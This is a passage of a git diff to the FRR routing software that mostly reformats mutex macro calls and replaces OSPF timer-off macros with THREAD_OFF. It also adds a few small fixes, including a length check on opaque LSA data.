* OSes where privs are process-wide.
*/
- frr_with_mutex(&(privs->mutex)) {
+ frr_with_mutex (&(privs->mutex)) {
/* Locate ref-counting object to use */
refs = get_privs_refs(privs);
@@ -517,7 +517,7 @@ void _zprivs_lower(struct zebra_privs_t **privs)
/* Serialize 'lower privs' operation - particularly important
* when OS privs are process-wide.
*/
- frr_with_mutex(&(*privs)->mutex) {
+ frr_with_mutex (&(*privs)->mutex) {
refs = get_privs_refs(*privs);
if (--(refs->refcount) == 0) {
diff --git a/lib/stream.c b/lib/stream.c
index 83ed015bc9..2de3abdf45 100644
--- a/lib/stream.c
+++ b/lib/stream.c
@@ -1280,7 +1280,7 @@ void stream_fifo_push(struct stream_fifo *fifo, struct stream *s)
void stream_fifo_push_safe(struct stream_fifo *fifo, struct stream *s)
{
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
stream_fifo_push(fifo, s);
}
}
@@ -1312,7 +1312,7 @@ struct stream *stream_fifo_pop_safe(struct stream_fifo *fifo)
{
struct stream *ret;
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
ret = stream_fifo_pop(fifo);
}
@@ -1328,7 +1328,7 @@ struct stream *stream_fifo_head_safe(struct stream_fifo *fifo)
{
struct stream *ret;
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
ret = stream_fifo_head(fifo);
}
@@ -1350,7 +1350,7 @@ void stream_fifo_clean(struct stream_fifo *fifo)
void stream_fifo_clean_safe(struct stream_fifo *fifo)
{
- frr_with_mutex(&fifo->mtx) {
+ frr_with_mutex (&fifo->mtx) {
stream_fifo_clean(fifo);
}
}
diff --git a/lib/thread.c b/lib/thread.c
index fd79503cc6..c3613b5b0e 100644
--- a/lib/thread.c
+++ b/lib/thread.c
@@ -217,7 +217,7 @@ static void cpu_record_print(struct vty *vty, uint8_t filter)
tmp.funcname = "TOTAL";
tmp.types = filter;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
for (ALL_LIST_ELEMENTS_RO(masters, ln, m)) {
const char *name = m->name ? m->name : "main";
@@ -283,9 +283,9 @@ static void cpu_record_clear(uint8_t filter)
struct thread_master *m;
struct listnode *ln;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
for (ALL_LIST_ELEMENTS_RO(masters, ln, m)) {
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
void *args[2] = {tmp, m->cpu_record};
hash_iterate(
m->cpu_record,
@@ -463,7 +463,7 @@ DEFUN_NOSH (show_thread_poll,
struct listnode *node;
struct thread_master *m;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
for (ALL_LIST_ELEMENTS_RO(masters, node, m)) {
show_thread_poll_helper(vty, m);
}
@@ -630,7 +630,7 @@ struct thread_master *thread_master_create(const char *name)
sizeof(struct pollfd) * rv->handler.pfdsize);
/* add to list of threadmasters */
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
if (!masters)
masters = list_new();
@@ -642,7 +642,7 @@ struct thread_master *thread_master_create(const char *name)
void thread_master_set_name(struct thread_master *master, const char *name)
{
- frr_with_mutex(&master->mtx) {
+ frr_with_mutex (&master->mtx) {
XFREE(MTYPE_THREAD_MASTER, master->name);
master->name = XSTRDUP(MTYPE_THREAD_MASTER, name);
}
@@ -708,7 +708,7 @@ static void thread_array_free(struct thread_master *m,
*/
void thread_master_free_unused(struct thread_master *m)
{
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
struct thread *t;
while ((t = thread_list_pop(&m->unuse)))
thread_free(m, t);
@@ -720,7 +720,7 @@ void thread_master_free(struct thread_master *m)
{
struct thread *t;
- frr_with_mutex(&masters_mtx) {
+ frr_with_mutex (&masters_mtx) {
listnode_delete(masters, m);
if (masters->count == 0) {
list_delete(&masters);
@@ -756,7 +756,10 @@ unsigned long thread_timer_remain_msec(struct thread *thread)
{
int64_t remain;
- frr_with_mutex(&thread->mtx) {
+ if (!thread_is_scheduled(thread))
+ return 0;
+
+ frr_with_mutex (&thread->mtx) {
remain = monotime_until(&thread->u.sands, NULL) / 1000LL;
}
@@ -772,7 +775,7 @@ unsigned long thread_timer_remain_second(struct thread *thread)
struct timeval thread_timer_remain(struct thread *thread)
{
struct timeval remain;
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
monotime_until(&thread->u.sands, &remain);
}
return remain;
@@ -987,7 +990,7 @@ void _thread_add_read_write(const struct xref_threadsched *xref,
if (fd >= m->fd_limit)
assert(!"Number of FD's open is greater than FRR currently configured to handle, aborting");
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
if (t_ptr && *t_ptr)
// thread is already scheduled; don't reschedule
break;
@@ -1030,7 +1033,7 @@ void _thread_add_read_write(const struct xref_threadsched *xref,
m->handler.pfdcount++;
if (thread) {
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->u.fd = fd;
thread_array[thread->u.fd] = thread;
}
@@ -1066,14 +1069,14 @@ static void _thread_add_timer_timeval(const struct xref_threadsched *xref,
monotime(&t);
timeradd(&t, time_relative, &t);
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
if (t_ptr && *t_ptr)
/* thread is already scheduled; don't reschedule */
return;
thread = thread_get(m, THREAD_TIMER, func, arg, xref);
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->u.sands = t;
thread_timer_list_add(&m->timer, thread);
if (t_ptr) {
@@ -1151,13 +1154,13 @@ void _thread_add_event(const struct xref_threadsched *xref,
assert(m != NULL);
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
if (t_ptr && *t_ptr)
/* thread is already scheduled; don't reschedule */
break;
thread = thread_get(m, THREAD_EVENT, func, arg, xref);
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->u.val = val;
thread_list_add_tail(&m->event, thread);
}
@@ -1438,7 +1441,7 @@ static void cancel_event_helper(struct thread_master *m, void *arg, int flags)
cr->flags = flags;
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
cr->eventobj = arg;
listnode_add(m->cancel_req, cr);
do_thread_cancel(m);
@@ -1496,7 +1499,7 @@ void thread_cancel(struct thread **thread)
assert(master->owner == pthread_self());
- frr_with_mutex(&master->mtx) {
+ frr_with_mutex (&master->mtx) {
struct cancel_req *cr =
XCALLOC(MTYPE_TMP, sizeof(struct cancel_req));
cr->thread = *thread;
@@ -1548,7 +1551,7 @@ void thread_cancel_async(struct thread_master *master, struct thread **thread,
assert(master->owner != pthread_self());
- frr_with_mutex(&master->mtx) {
+ frr_with_mutex (&master->mtx) {
master->canceled = false;
if (thread) {
@@ -1928,7 +1931,7 @@ unsigned long thread_consumed_time(RUSAGE_T *now, RUSAGE_T *start,
int thread_should_yield(struct thread *thread)
{
int result;
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
result = monotime_since(&thread->real, NULL)
> (int64_t)thread->yield;
}
@@ -1937,7 +1940,7 @@ int thread_should_yield(struct thread *thread)
void thread_set_yield_time(struct thread *thread, unsigned long yield_time)
{
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->yield = yield_time;
}
}
@@ -2079,11 +2082,11 @@ void _thread_execute(const struct xref_threadsched *xref,
struct thread *thread;
/* Get or allocate new thread to execute. */
- frr_with_mutex(&m->mtx) {
+ frr_with_mutex (&m->mtx) {
thread = thread_get(m, THREAD_EVENT, func, arg, xref);
/* Set its event value. */
- frr_with_mutex(&thread->mtx) {
+ frr_with_mutex (&thread->mtx) {
thread->add_type = THREAD_EXECUTE;
thread->u.val = val;
thread->ref = &thread;
diff --git a/lib/zlog_targets.c b/lib/zlog_targets.c
index 48785ad298..31bd8e16eb 100644
--- a/lib/zlog_targets.c
+++ b/lib/zlog_targets.c
@@ -242,14 +242,14 @@ static bool zlog_file_cycle(struct zlog_cfg_file *zcf)
void zlog_file_set_other(struct zlog_cfg_file *zcf)
{
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
zlog_file_cycle(zcf);
}
}
bool zlog_file_set_filename(struct zlog_cfg_file *zcf, const char *filename)
{
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
XFREE(MTYPE_LOG_FD_NAME, zcf->filename);
zcf->filename = XSTRDUP(MTYPE_LOG_FD_NAME, filename);
zcf->fd = -1;
@@ -261,7 +261,7 @@ bool zlog_file_set_filename(struct zlog_cfg_file *zcf, const char *filename)
bool zlog_file_set_fd(struct zlog_cfg_file *zcf, int fd)
{
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
if (zcf->fd == fd)
return true;
@@ -283,7 +283,7 @@ bool zlog_file_rotate(struct zlog_cfg_file *zcf)
struct rcu_close_rotate *rcr;
int fd;
- frr_with_mutex(&zcf->cfg_mtx) {
+ frr_with_mutex (&zcf->cfg_mtx) {
if (!zcf->active || !zcf->filename)
return true;
@@ -517,7 +517,7 @@ void zlog_syslog_set_facility(int facility)
struct zlog_target *newztc;
struct zlt_syslog *newzt;
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
if (facility == syslog_facility)
return;
syslog_facility = facility;
@@ -540,7 +540,7 @@ void zlog_syslog_set_facility(int facility)
int zlog_syslog_get_facility(void)
{
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
return syslog_facility;
}
assert(0);
@@ -551,7 +551,7 @@ void zlog_syslog_set_prio_min(int prio_min)
struct zlog_target *newztc;
struct zlt_syslog *newzt = NULL;
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
if (prio_min == syslog_prio_min)
return;
syslog_prio_min = prio_min;
@@ -577,7 +577,7 @@ void zlog_syslog_set_prio_min(int prio_min)
int zlog_syslog_get_prio_min(void)
{
- frr_with_mutex(&syslog_cfg_mutex) {
+ frr_with_mutex (&syslog_cfg_mutex) {
return syslog_prio_min;
}
assert(0);
diff --git a/ospf6d/ospf6_gr_helper.c b/ospf6d/ospf6_gr_helper.c
index 33a7a57c0f..f8b37d803f 100644
--- a/ospf6d/ospf6_gr_helper.c
+++ b/ospf6d/ospf6_gr_helper.c
@@ -340,7 +340,7 @@ int ospf6_process_grace_lsa(struct ospf6 *ospf6, struct ospf6_lsa *lsa,
&& !OSPF6_GR_IS_PLANNED_RESTART(restart_reason)) {
if (IS_DEBUG_OSPF6_GR)
zlog_debug(
- "%s, Router supports only planned restarts but received the GRACE LSA due a unplanned restart",
+ "%s, Router supports only planned restarts but received the GRACE LSA due to an unplanned restart",
__func__);
restarter->gr_helper_info.rejected_reason =
OSPF6_HELPER_PLANNED_ONLY_RESTART;
diff --git a/ospfclient/ospf_apiclient.c b/ospfclient/ospf_apiclient.c
index e84c6f5b3c..b5e6389d4c 100644
--- a/ospfclient/ospf_apiclient.c
+++ b/ospfclient/ospf_apiclient.c
@@ -439,6 +439,12 @@ int ospf_apiclient_lsa_originate(struct ospf_apiclient *oclient,
struct lsa_header *lsah;
uint32_t tmp;
+ /* Validate opaque LSA length */
+ if ((size_t)opaquelen > sizeof(buf) - sizeof(struct lsa_header)) {
+ fprintf(stderr, "opaquelen(%d) is larger than buf size %zu\n",
+ opaquelen, sizeof(buf));
+ return OSPF_API_NOMEMORY;
+ }
/* We can only originate opaque LSAs */
if (!IS_OPAQUE_LSA(lsa_type)) {
diff --git a/ospfd/ospf_apiserver.c b/ospfd/ospf_apiserver.c
index 9d73c3dfe6..b8567830b1 100644
--- a/ospfd/ospf_apiserver.c
+++ b/ospfd/ospf_apiserver.c
@@ -318,12 +318,12 @@ void ospf_apiserver_free(struct ospf_apiserver *apiserv)
struct listnode *node;
/* Cancel read and write threads. */
- thread_cancel(&apiserv->t_sync_read);
+ THREAD_OFF(apiserv->t_sync_read);
#ifdef USE_ASYNC_READ
- thread_cancel(&apiserv->t_async_read);
+ THREAD_OFF(apiserv->t_async_read);
#endif /* USE_ASYNC_READ */
- thread_cancel(&apiserv->t_sync_write);
- thread_cancel(&apiserv->t_async_write);
+ THREAD_OFF(apiserv->t_sync_write);
+ THREAD_OFF(apiserv->t_async_write);
/* Unregister all opaque types that application registered
and flush opaque LSAs if still in LSDB. */
diff --git a/ospfd/ospf_gr.c b/ospfd/ospf_gr.c
index 2521f2fce0..66ef1d6564 100644
--- a/ospfd/ospf_gr.c
+++ b/ospfd/ospf_gr.c
@@ -216,7 +216,7 @@ static void ospf_gr_restart_exit(struct ospf *ospf, const char *reason)
zlog_debug("GR: exiting graceful restart: %s", reason);
ospf->gr_info.restart_in_progress = false;
- OSPF_TIMER_OFF(ospf->gr_info.t_grace_period);
+ THREAD_OFF(ospf->gr_info.t_grace_period);
/* Record in non-volatile memory that the restart is complete. */
ospf_gr_nvm_delete(ospf);
diff --git a/ospfd/ospf_interface.c b/ospfd/ospf_interface.c
index 5df2ecf070..633ab05131 100644
--- a/ospfd/ospf_interface.c
+++ b/ospfd/ospf_interface.c
@@ -302,7 +302,7 @@ void ospf_if_cleanup(struct ospf_interface *oi)
/* oi->nbrs and oi->nbr_nbma should be deleted on InterfaceDown event */
/* delete all static neighbors attached to this interface */
for (ALL_LIST_ELEMENTS(oi->nbr_nbma, node, nnode, nbr_nbma)) {
- OSPF_POLL_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
if (nbr_nbma->nbr) {
nbr_nbma->nbr->nbr_nbma = NULL;
@@ -513,7 +513,7 @@ void ospf_if_stream_unset(struct ospf_interface *oi)
if (oi->on_write_q) {
listnode_delete(ospf->oi_write_q, oi);
if (list_isempty(ospf->oi_write_q))
- OSPF_TIMER_OFF(ospf->t_write);
+ THREAD_OFF(ospf->t_write);
oi->on_write_q = 0;
}
}
@@ -1474,7 +1474,7 @@ void ospf_reset_hello_timer(struct interface *ifp, struct in_addr addr,
ospf_hello_send(oi);
/* Restart hello timer for this interface */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_hello);
OSPF_HELLO_TIMER_ON(oi);
}
@@ -1498,7 +1498,7 @@ void ospf_reset_hello_timer(struct interface *ifp, struct in_addr addr,
ospf_hello_send(oi);
/* Restart the hello timer. */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_hello);
OSPF_HELLO_TIMER_ON(oi);
}
}
diff --git a/ospfd/ospf_ism.c b/ospfd/ospf_ism.c
index 97da61034f..ab75ab9a1a 100644
--- a/ospfd/ospf_ism.c
+++ b/ospfd/ospf_ism.c
@@ -290,16 +290,16 @@ static void ism_timer_set(struct ospf_interface *oi)
interface parameters must be set to initial values, and
timers are
reset also. */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
- OSPF_ISM_TIMER_OFF(oi->t_ls_ack);
+ THREAD_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_ls_ack);
break;
case ISM_Loopback:
/* In this state, the interface may be looped back and will be
unavailable for regular data traffic. */
- OSPF_ISM_TIMER_OFF(oi->t_hello);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
- OSPF_ISM_TIMER_OFF(oi->t_ls_ack);
+ THREAD_OFF(oi->t_hello);
+ THREAD_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_ls_ack);
break;
case ISM_Waiting:
/* The router is trying to determine the identity of DRouter and
@@ -309,7 +309,7 @@ static void ism_timer_set(struct ospf_interface *oi)
OSPF_ISM_TIMER_MSEC_ON(oi->t_hello, ospf_hello_timer, 1);
OSPF_ISM_TIMER_ON(oi->t_wait, ospf_wait_timer,
OSPF_IF_PARAM(oi, v_wait));
- OSPF_ISM_TIMER_OFF(oi->t_ls_ack);
+ THREAD_OFF(oi->t_ls_ack);
break;
case ISM_PointToPoint:
/* The interface connects to a physical Point-to-point network
@@ -318,7 +318,7 @@ static void ism_timer_set(struct ospf_interface *oi)
neighboring router. Hello packets are also sent. */
/* send first hello immediately */
OSPF_ISM_TIMER_MSEC_ON(oi->t_hello, ospf_hello_timer, 1);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
@@ -328,7 +328,7 @@ static void ism_timer_set(struct ospf_interface *oi)
and the router itself is neither Designated Router nor
Backup Designated Router. */
OSPF_HELLO_TIMER_ON(oi);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
@@ -337,7 +337,7 @@ static void ism_timer_set(struct ospf_interface *oi)
network,
and the router is Backup Designated Router. */
OSPF_HELLO_TIMER_ON(oi);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
@@ -346,7 +346,7 @@ static void ism_timer_set(struct ospf_interface *oi)
network,
and the router is Designated Router. */
OSPF_HELLO_TIMER_ON(oi);
- OSPF_ISM_TIMER_OFF(oi->t_wait);
+ THREAD_OFF(oi->t_wait);
OSPF_ISM_TIMER_ON(oi->t_ls_ack, ospf_ls_ack_timer,
oi->v_ls_ack);
break;
diff --git a/ospfd/ospf_ism.h b/ospfd/ospf_ism.h
index 35fbd15d00..92329bc55e 100644
--- a/ospfd/ospf_ism.h
+++ b/ospfd/ospf_ism.h
@@ -78,9 +78,6 @@
OSPF_IF_PARAM((O), v_hello)); \
} while (0)
-/* Macro for OSPF ISM timer turn off. */
-#define OSPF_ISM_TIMER_OFF(X) thread_cancel(&(X))
-
/* Macro for OSPF schedule event. */
#define OSPF_ISM_EVENT_SCHEDULE(I, E) \
thread_add_event(master, ospf_ism_event, (I), (E), NULL)
diff --git a/ospfd/ospf_lsa.c b/ospfd/ospf_lsa.c
index 2be81042a6..af05f5b59e 100644
--- a/ospfd/ospf_lsa.c
+++ b/ospfd/ospf_lsa.c
@@ -1761,7 +1761,7 @@ static struct ospf_lsa *ospf_handle_exnl_lsa_lsId_chg(struct ospf *ospf,
struct as_external_lsa *al;
struct in_addr mask;
struct ospf_lsa *new;
- struct external_info ei_summary;
+ struct external_info ei_summary = {};
struct external_info *ei_old;
lsa = ospf_lsdb_lookup_by_id(ospf->lsdb, OSPF_AS_EXTERNAL_LSA,
@@ -3625,7 +3625,7 @@ void ospf_flush_self_originated_lsas_now(struct ospf *ospf)
* without conflicting to other threads.
*/
if (ospf->t_maxage != NULL) {
- OSPF_TIMER_OFF(ospf->t_maxage);
+ THREAD_OFF(ospf->t_maxage);
thread_execute(master, ospf_maxage_lsa_remover, ospf, 0);
}
@@ -3935,9 +3935,9 @@ void ospf_refresher_register_lsa(struct ospf *ospf, struct ospf_lsa *lsa)
if (IS_DEBUG_OSPF(lsa, LSA_REFRESH))
zlog_debug(
- "LSA[Refresh:Type%d:%pI4]: ospf_refresher_register_lsa(): setting refresh_list on lsa %p (slod %d)",
- lsa->data->type, &lsa->data->id,
- (void *)lsa, index);
+ "LSA[Refresh:Type%d:%pI4]: ospf_refresher_register_lsa(): setting refresh_list on lsa %p (slot %d)",
+ lsa->data->type, &lsa->data->id, (void *)lsa,
+ index);
}
}
diff --git a/ospfd/ospf_neighbor.c b/ospfd/ospf_neighbor.c
index c59734b9f3..02c44dcdc1 100644
--- a/ospfd/ospf_neighbor.c
+++ b/ospfd/ospf_neighbor.c
@@ -140,17 +140,17 @@ void ospf_nbr_free(struct ospf_neighbor *nbr)
}
/* Cancel all timers. */
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_req);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_upd);
+ THREAD_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_ls_req);
+ THREAD_OFF(nbr->t_ls_upd);
/* Cancel all events. */ /* Thread lookup cost would be negligible. */
thread_cancel_event(master, nbr);
bfd_sess_free(&nbr->bfd_session);
- OSPF_NSM_TIMER_OFF(nbr->gr_helper_info.t_grace_timer);
+ THREAD_OFF(nbr->gr_helper_info.t_grace_timer);
nbr->oi = NULL;
XFREE(MTYPE_OSPF_NEIGHBOR, nbr);
@@ -456,7 +456,7 @@ static struct ospf_neighbor *ospf_nbr_add(struct ospf_interface *oi,
nbr->nbr_nbma = nbr_nbma;
if (nbr_nbma->t_poll)
- OSPF_POLL_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
nbr->state_change = nbr_nbma->state_change + 1;
}
diff --git a/ospfd/ospf_nsm.c b/ospfd/ospf_nsm.c
index c538d1a09a..333389596b 100644
--- a/ospfd/ospf_nsm.c
+++ b/ospfd/ospf_nsm.c
@@ -120,32 +120,32 @@ static void nsm_timer_set(struct ospf_neighbor *nbr)
switch (nbr->state) {
case NSM_Deleted:
case NSM_Down:
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
- OSPF_NSM_TIMER_OFF(nbr->t_hello_reply);
+ THREAD_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_hello_reply);
/* fallthru */
case NSM_Attempt:
case NSM_Init:
case NSM_TwoWay:
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_upd);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_req);
+ THREAD_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_ls_upd);
+ THREAD_OFF(nbr->t_ls_req);
break;
case NSM_ExStart:
OSPF_NSM_TIMER_ON(nbr->t_db_desc, ospf_db_desc_timer,
nbr->v_db_desc);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_upd);
- OSPF_NSM_TIMER_OFF(nbr->t_ls_req);
+ THREAD_OFF(nbr->t_ls_upd);
+ THREAD_OFF(nbr->t_ls_req);
break;
case NSM_Exchange:
OSPF_NSM_TIMER_ON(nbr->t_ls_upd, ospf_ls_upd_timer,
nbr->v_ls_upd);
if (!IS_SET_DD_MS(nbr->dd_flags))
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_db_desc);
break;
case NSM_Loading:
case NSM_Full:
default:
- OSPF_NSM_TIMER_OFF(nbr->t_db_desc);
+ THREAD_OFF(nbr->t_db_desc);
break;
}
}
@@ -176,13 +176,13 @@ int nsm_should_adj(struct ospf_neighbor *nbr)
static int nsm_hello_received(struct ospf_neighbor *nbr)
{
/* Start or Restart Inactivity Timer. */
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_inactivity);
OSPF_NSM_TIMER_ON(nbr->t_inactivity, ospf_inactivity_timer,
nbr->v_inactivity);
if (nbr->oi->type == OSPF_IFTYPE_NBMA && nbr->nbr_nbma)
- OSPF_POLL_TIMER_OFF(nbr->nbr_nbma->t_poll);
+ THREAD_OFF(nbr->nbr_nbma->t_poll);
/* Send proactive ARP requests */
if (nbr->state < NSM_Exchange)
@@ -194,9 +194,9 @@ static int nsm_hello_received(struct ospf_neighbor *nbr)
static int nsm_start(struct ospf_neighbor *nbr)
{
if (nbr->nbr_nbma)
- OSPF_POLL_TIMER_OFF(nbr->nbr_nbma->t_poll);
+ THREAD_OFF(nbr->nbr_nbma->t_poll);
- OSPF_NSM_TIMER_OFF(nbr->t_inactivity);
+ THREAD_OFF(nbr->t_inactivity);
OSPF_NSM_TIMER_ON(nbr->t_inactivity, ospf_inactivity_timer,
nbr->v_inactivity);
diff --git a/ospfd/ospf_nsm.h b/ospfd/ospf_nsm.h
index 0b40b1f424..c526c4c3ed 100644
--- a/ospfd/ospf_nsm.h
+++ b/ospfd/ospf_nsm.h
@@ -58,9 +58,6 @@
/* Macro for OSPF NSM timer turn on. */
#define OSPF_NSM_TIMER_ON(T,F,V) thread_add_timer (master, (F), nbr, (V), &(T))
-/* Macro for OSPF NSM timer turn off. */
-#define OSPF_NSM_TIMER_OFF(X) thread_cancel(&(X))
-
/* Macro for OSPF NSM schedule event. */
#define OSPF_NSM_EVENT_SCHEDULE(N, E) \
thread_add_event(master, ospf_nsm_event, (N), (E), NULL)
diff --git a/ospfd/ospf_opaque.c b/ospfd/ospf_opaque.c
index 7e95cb591a..c7ac81d961 100644
--- a/ospfd/ospf_opaque.c
+++ b/ospfd/ospf_opaque.c
@@ -147,7 +147,7 @@ int ospf_opaque_type9_lsa_init(struct ospf_interface *oi)
void ospf_opaque_type9_lsa_term(struct ospf_interface *oi)
{
- OSPF_TIMER_OFF(oi->t_opaque_lsa_self);
+ THREAD_OFF(oi->t_opaque_lsa_self);
if (oi->opaque_lsa_self != NULL)
list_delete(&oi->opaque_lsa_self);
oi->opaque_lsa_self = NULL;
@@ -176,7 +176,7 @@ void ospf_opaque_type10_lsa_term(struct ospf_area *area)
area->lsdb->new_lsa_hook = area->lsdb->del_lsa_hook = NULL;
#endif /* MONITOR_LSDB_CHANGE */
- OSPF_TIMER_OFF(area->t_opaque_lsa_self);
+ THREAD_OFF(area->t_opaque_lsa_self);
if (area->opaque_lsa_self != NULL)
list_delete(&area->opaque_lsa_self);
return;
@@ -204,7 +204,7 @@ void ospf_opaque_type11_lsa_term(struct ospf *top)
top->lsdb->new_lsa_hook = top->lsdb->del_lsa_hook = NULL;
#endif /* MONITOR_LSDB_CHANGE */
- OSPF_TIMER_OFF(top->t_opaque_lsa_self);
+ THREAD_OFF(top->t_opaque_lsa_self);
if (top->opaque_lsa_self != NULL)
list_delete(&top->opaque_lsa_self);
return;
@@ -603,7 +603,7 @@ static void free_opaque_info_per_type(struct opaque_info_per_type *oipt,
ospf_opaque_lsa_flush_schedule(lsa);
}
- OSPF_TIMER_OFF(oipt->t_opaque_lsa_self);
+ THREAD_OFF(oipt->t_opaque_lsa_self);
list_delete(&oipt->id_list);
if (cleanup_owner) {
/* Remove from its owner's self-originated LSA list. */
@@ -711,7 +711,7 @@ static void free_opaque_info_per_id(void *val)
{
struct opaque_info_per_id *oipi = (struct opaque_info_per_id *)val;
- OSPF_TIMER_OFF(oipi->t_opaque_lsa_self);
+ THREAD_OFF(oipi->t_opaque_lsa_self);
if (oipi->lsa != NULL)
ospf_lsa_unlock(&oipi->lsa);
XFREE(MTYPE_OPAQUE_INFO_PER_ID, oipi);
diff --git a/ospfd/ospf_packet.c b/ospfd/ospf_packet.c
index c319f8068a..4b3f30a3f1 100644
--- a/ospfd/ospf_packet.c
+++ b/ospfd/ospf_packet.c
@@ -466,7 +466,7 @@ static void ospf_ls_req_timer(struct thread *thread)
void ospf_ls_req_event(struct ospf_neighbor *nbr)
{
- thread_cancel(&nbr->t_ls_req);
+ THREAD_OFF(nbr->t_ls_req);
thread_add_event(master, ospf_ls_req_timer, nbr, 0, &nbr->t_ls_req);
}
@@ -4103,7 +4103,7 @@ static void ospf_ls_upd_queue_send(struct ospf_interface *oi,
* is actually turned off.
*/
if (list_isempty(oi->ospf->oi_write_q))
- OSPF_TIMER_OFF(oi->ospf->t_write);
+ THREAD_OFF(oi->ospf->t_write);
} else {
/* Hook thread to write packet. */
OSPF_ISM_WRITE_ON(oi->ospf);
diff --git a/ospfd/ospf_vty.c b/ospfd/ospf_vty.c
index 5bb65b6abc..1c22fad669 100644
--- a/ospfd/ospf_vty.c
+++ b/ospfd/ospf_vty.c
@@ -9748,7 +9748,7 @@ DEFUN (no_ospf_max_metric_router_lsa_startup,
for (ALL_LIST_ELEMENTS_RO(ospf->areas, ln, area)) {
SET_FLAG(area->stub_router_state,
OSPF_AREA_WAS_START_STUB_ROUTED);
- OSPF_TIMER_OFF(area->t_stub_router);
+ THREAD_OFF(area->t_stub_router);
/* Don't trample on admin stub routed */
if (!CHECK_FLAG(area->stub_router_state,
diff --git a/ospfd/ospfd.c b/ospfd/ospfd.c
index 33872950ac..8512b6a339 100644
--- a/ospfd/ospfd.c
+++ b/ospfd/ospfd.c
@@ -572,7 +572,7 @@ static struct ospf *ospf_lookup_by_name(const char *vrf_name)
static void ospf_deferred_shutdown_finish(struct ospf *ospf)
{
ospf->stub_router_shutdown_time = OSPF_STUB_ROUTER_UNCONFIGURED;
- OSPF_TIMER_OFF(ospf->t_deferred_shutdown);
+ THREAD_OFF(ospf->t_deferred_shutdown);
ospf_finish_final(ospf);
@@ -754,7 +754,7 @@ static void ospf_finish_final(struct ospf *ospf)
/* Clear static neighbors */
for (rn = route_top(ospf->nbr_nbma); rn; rn = route_next(rn))
if ((nbr_nbma = rn->info)) {
- OSPF_POLL_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
if (nbr_nbma->nbr) {
nbr_nbma->nbr->nbr_nbma = NULL;
@@ -790,22 +790,22 @@ static void ospf_finish_final(struct ospf *ospf)
}
/* Cancel all timers. */
- OSPF_TIMER_OFF(ospf->t_read);
- OSPF_TIMER_OFF(ospf->t_write);
- OSPF_TIMER_OFF(ospf->t_spf_calc);
- OSPF_TIMER_OFF(ospf->t_ase_calc);
- OSPF_TIMER_OFF(ospf->t_maxage);
